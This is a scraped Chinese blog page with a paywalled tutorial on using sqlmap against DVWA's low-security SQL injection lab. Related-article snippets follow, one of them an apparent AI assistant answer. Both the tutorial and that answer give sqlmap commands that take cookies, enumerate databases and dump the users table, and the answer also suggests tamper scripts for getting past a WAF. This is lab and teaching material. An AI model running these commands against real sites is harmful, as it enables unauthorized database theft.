DVWA之LOW级别SQL注入---SQLMap使用

最新推荐文章于 2025-10-13 15:46:17 发布

原创

最新推荐文章于 2025-10-13 15:46:17 发布 · 7.9k 阅读

17 ·

CC 4.0 BY-SA版权

文章标签：

#dvwa #sqlmap #sql注入

本文介绍了如何利用SQLMap工具检测和利用DVWA中的LOW级别SQL注入漏洞。通过输入测试数据确定存在注入后，使用SQLMap进行一系列操作，包括识别数据库类型、获取数据库名、查看表及列信息，并最终通过字典攻击获取用户密码。

看到这篇文章，相信大家对于DVWA的搭建已经没问题了吧，在这里就不在赘述DVWA的搭建过程。

SQLMap之dvwa简单使用实例：

一、首先肯定是要判断是否有注入漏洞，在输入框输入1，返回

ID: 1
First name: admin
Surname: admin

返回正常；

再次输入1'，报错，返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞，下面利用SQLMap进行注入攻击。

二、利用SQLMap工具

<①>

python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"

# -u " "参数--URL，进行测试，
# 提示：

sqlmap got a 302 redirect to 'http://localhost:82/DVWA-master/login.php'. Do you want to follow? [Y/n]

# (SqLMAP得到302重定向到“http://LoalHoo:/DVWAuthMistal/Logial.php”。你想跟上吗？[y/n])
# 根据该提示，可以判断(302重定向)跳转至登录页面，看来需要带cookie

python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "F12→→Console→→document.cookie得到当前页面cookie"

# 得到数据库类型版本(MySQL)，服务器类型版本(Apache,PHP)
# the back-end DBMS is MySQL &n

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

5
点赞
踩
17

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

利用DVWA学习sqlmap（1）

csu_vc的博客

07-17

8568

首先我们要在一台机器上配置dvwa环境下载地址 https://github.com/ethicalhack3r/DVWA 把DVWA的源代码下载好之后，我们需要在受害机器上配置web服务，并配置dvwa 这里我使用的是phpstudy，因为它比较方便把dvwa的源代码解压到phpstudy的www目录下，并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库

DVWA-SQL注入（sqlmap安装和使用）

weixin_53256941的博客

07-12

1097

一.Python环境安装链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量我的电脑，找到属性点击高级系统设置出现"系统属性",点击环境变量在下面的"系统变量"里面找到Path变量点击编辑，（没有的话点击新建）在变量值末尾，填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功二.Sqlmap安装链接：https://pan.baidu.

参与评论您还未登录，请先登录后发表或查看评论

常见的Sql注入利用及sqlmap的简单使用（均在靶场内实现）

最新发布

2302_81234358的博客

10-13

1076

本文系统梳理了SQL注入技术，包括以下核心内容：1. 注入基础知识：URL编码规则（%23代替#、%20代替空格等）、进制标识方法；2. 常见注入点：URL参数、表单输入、Cookie、HTTP头部字段等；3. 主要注入方法：联合查询（union）、布尔盲注（length/substr/ascii）、时间盲注（if/sleep）、报错注入（updatexml/extractvalue）、宽字节注入、DNSLOG注入；4. 完整注入流程：判断注入点→闭合方式→字段数→回显位→获取库/表/列信息→提取数据；5.

DVWA-SQL Injection 注入&Sqlmap

原味瓜子、的博客

09-22

542

文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT

dvwa-low使用sqlmap爆破

guetstudents的博客

11-23

160

通过sqlmap确认输入的链接存在基于布尔类型的盲注、基于错误的注入、时间注入攻击-时间盲注、union注入攻击。准备好自已的dvwa环境和检查一下kali上的sqlmap是否可用，有时候sqlmap会出现版本过旧的问题。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。3.-D 数据库名 -T 表名 --columns 获取表中所有字段。显示需要我们进行登录，我们可以获取网站的cookie，F12打开。2.-D 数据库名 --tables 获取库中所有表。

【渗透测试】【Sqlmap】DVWA-SQL Injection（low)

preserphy的博客

07-05

474

①进入sqlmap目录，使用-u命令访问地址：python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"发现跳转到302了，被重定向了，所以这样不行…又回到浏览器页面看了一下请求，发现里面有cookie，所以我们要把相应的cookie加上。②使用--cookie命令加...

DVWA——SQL注入——sqlmap实现

weixin_46709219的博客

11-14

1706

网络安全-sqlmap学习笔记 sqlmap上面的总连接

【渗透测试】|sqlmap工具注入-基于dvwa的sql injection

yangdan_jiayou的博客

03-27

1566

这个检测结果表明系统对联合查询的处理方式存在漏洞，可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞，可以通过错误消息来推断数据库的结构或内容，从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在，如果系统在执行这个查询时发生了延迟，那么说明注入点存在，攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误，然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。

使用sqlmap完成sql注入DVWA

dongf2019的博客

12-12

1680

------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器，设置代理为127.0.0.1，端口为8080，访问dvwa的sql injection页面，输入1，submit。显示出users表格所以数据，其中用户密码已经从MD5还原为明文。2、启动dvwa，启动后地址为192.168.88.128。

SQL注入（DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法）

tmzy1的博客

03-19

7362

SQL注入（DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法）

Web安全学习日记4 - DVWA sqlmap工具实现SQL注入

qq_46081990的博客

03-10

836

Medium 级别的表单通过 POST 方式提交，需要使用 --data 参数把数据引入过来，再改一下cookie，其余和 Low 级别一样。可以看到页面需要 cookie 来认证身份，通过 burpsuite 抓包得到 cookie。将 cookie 添加进去。

dvwa之sql injection之sqlmap工具注入（low版）

crowsec

04-27

1936

可能要用到的参数：-u 指定URL--cookie 带cookie注入爆库：--dbs 发现所有数据库（参数前有空格）列出数据库：--tables 列出数据库表（参数前有空格）-D 选择数据库首先一定先把难度调为low当写1-5的时候，都会有值出来直接上工具如下：Sqlmap -u "http://127.0.0.1/dv...

DVWA之SQL注入漏洞与SQLmap

leaf_lucky的博客

01-24

1132

对于以上两个语句，1=1会正常输出，而1=2 错误输出，可以说明SQL语句生效，SQL语句存在漏洞。用户输入SQL语句，执行了MySQL内置函数user(),database()而对于以下语句，可以发现没有语句，SQL语句变化，1!= 2,不能得到输出。输入上面的语句有正常输出，对于“#”的作用是注释后续SQL语句。点击第一个，找到cookie，复制下来，即是以下语句。上面语句为原本的SQL语句，下面语句为过滤后的语句。对于上面三句语句，依次进行判断，可以得到。输入1' order by 1#得到。

SQL注入漏洞的手动注入+sqlmap自动化注入dvwa-Low

2301_81984903的博客

05-14

1971

本文详细介绍了MySQL数据库的基本操作和SQL注入测试方法。首先，通过命令行登录MySQL数据库，展示了如何查询数据库、数据表及表中的数据。接着，文章深入探讨了SQL注入技术，包括数字型和字符型注入的区分方法，以及如何使用order by和and语句进行注入测试。此外，文章还介绍了使用sqlmap工具进行自动化SQL注入测试的步骤，包括探测注入点、获取数据库信息、表名、列名及数据等。通过这些操作，可以有效地识别和利用SQL注入漏洞，获取数据库中的敏感信息。

DVWA靶场通关笔记-SQL注入(SQL Injection low级别)

mooyuan的网络安全博客

07-07

891

DVWA（Damn Vulnerable Web Application）中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景，不同安全等级存在不同的脆弱点和绕过方法，本小节对低等级别的关卡进行渗透实战。

DVWA系列之22 low级别上传漏洞

weixin_33804582的博客

01-05

228

大多数的网站通常都会提供文件上传的功能，例如上传图片或是文档等，只要网站允许上传，就有可能存在上传漏洞。上传漏洞与SQL注入相比，其风险更大，***利用上传漏洞的主要目的是将WebShell上传到网站中，从而达到控制网站甚至整个服务器的目的。在看过的很多******实践案例中，上传漏洞和SQL注入都是两种并重的主流***手法。在DVWA中选择Upload，首先分析low级别的代码：首先站点通过up...

dvwa sql注入

weixin_62420492的博客

12-19

2607

dvwa sql （low) 注入一. 手工注入二.利用sqlmap注入

SQL注入的环境搭建与简单操作

qq_51627527的博客

12-16

815

SQL注入：DVWA+SQLmap+Mysql注入实战实验环境搭建。启动Metasploitable2虚拟机。

SQL 注入

zhujing123_yorkg的博客

01-21

273

SQL 注入一：介绍 SQL 注入攻击是网络上非常常见的一种攻击！现在的 Web 程序基本都是三层架构，也就是我们常说的 MVC 模式：表示层：用于数据的展示，也就是前端界面业务逻辑层：用于接受前端页面传入的参数，进行逻辑处理数据访问层：逻辑层处理完毕之后，会将数据存储到对应的数据库，例如mysql、oracle、sqlserver等等例如在上图中，用户访问主页进行了如下过程： 1、在 Web 浏览器中输入www.shiyanlou.com接到对应的服务器 2、Web服务器从本地存储中加载in

dvwasql注入sqlmap

03-20

<think>嗯，用户想用sqlmap对DVWA进行SQL注入测试。首先，我得回忆一下DVWA的配置。DVWA是一个漏洞测试环境，通常需要PHP服务器支持，比如用XAMPP或者phpStudy。用户可能需要先确保DVWA已经正确安装，并且能通过浏览器访问。接下来，用户需要使用sqlmap，这是一个自动化的SQL注入工具。根据引用中的信息，用户需要获取目标URL和cookie。因为DVWA的SQL注入页面可能需要登录，所以cookie是必须的。比如引用[3]提到，打开DVWA主页后进入SQL注入页面，然后获取cookie。这一步很重要，否则sqlmap可能无法正确访问受保护的页面。然后，构造sqlmap命令。用户需要指定目标URL，带上cookie参数，这样才能通过身份验证。例如，引用[1]和[5]中的命令格式是：sqlmap -u "URL" --cookie="..."。这里要注意URL中的参数是否正确，比如id=1可能存在注入点。另外，可能需要处理特殊字符，比如&符号在命令行中需要转义或者用引号包裹。如果出现404错误或者测试页面返回问题，引用[2]建议重置DVWA或重启phpStudy，这可能是由于会话过期或服务未运行导致的。用户可能需要检查服务状态，或者重新登录DVWA获取新的cookie。接下来，用户可能需要枚举数据库、表、列等。引用[4]展示了如何获取数据库表名，使用-D参数指定数据库，--tables枚举表。这需要用户逐步执行命令，先获取数据库列表，再选择目标数据库，进一步获取表结构。用户可能遇到的问题包括：cookie获取不正确，URL构造错误，或者DVWA的安全等级设置。DVWA的安全等级分为low、medium、high等，不同等级可能需要不同的注入方式。例如，low级别可能更容易注入，而high级别可能需要更复杂的绕过技术。所以用户需要确认DVWA的安全等级设置为low，如引用中提到的--cookie="security=low"。此外，使用--batch参数可以让sqlmap自动选择默认选项，减少交互步骤，适合新手。但用户需要注意，某些情况下可能需要手动确认选项，比如当sqlmap检测到可能的注入点但不确定时。总结步骤应该是：准备环境，获取URL和cookie，执行sqlmap命令逐步注入，处理可能出现的错误，如404或会话问题。同时，根据引用中的示例命令，用户需要替换为自己的IP地址、PHPSESSID等信息，确保命令正确执行。最后，用户可能需要了解如何利用注入后的数据，比如获取用户凭证或其他敏感信息。不过，根据问题描述，用户目前的需求是测试注入攻击，因此重点应放在如何正确配置和使用sqlmap上。</think>以下是使用sqlmap对DVWA进行SQL注入攻击测试的步骤指南： ### 一、环境准备 1. 确保DVWA已部署在PHP环境（如XAMPP/phpStudy）中，且安全级别设置为`low`[^3] 2. 确认Kali Linux已安装sqlmap工具（默认自带） ### 二、获取关键信息 1. 访问DVWA的SQL注入页面： $$http://[靶机IP]/dvwa/vulnerabilities/sqli/$$ 2. 按F12打开开发者工具，在存储标签页获取Cookie值（包含`security`和`PHPSESSID`）[^3] ### 三、注入命令示例 ```bash sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="security=low; PHPSESSID=your_session_id" \ --batch ``` *注意：IP地址和PHPSESSID需替换为实际值，参数中的`&`需转义为`\&`或包裹在引号中[^1]* ### 四、进阶操作 1. **获取数据库列表**： ```bash sqlmap [...] --dbs ``` 2. **获取指定数据库表名**： ```bash sqlmap [...] -D dvwa --tables ``` 3. **提取用户表数据**： ```bash sqlmap [...] -D dvwa -T users --dump ``` ### 五、常见问题处理 - **404错误**：检查DVWA服务状态，重启phpStudy/XAMPP[^2] - **会话失效**：重新登录DVWA获取新PHPSESSID - **WAF拦截**：尝试使用`--tamper`参数绕过防护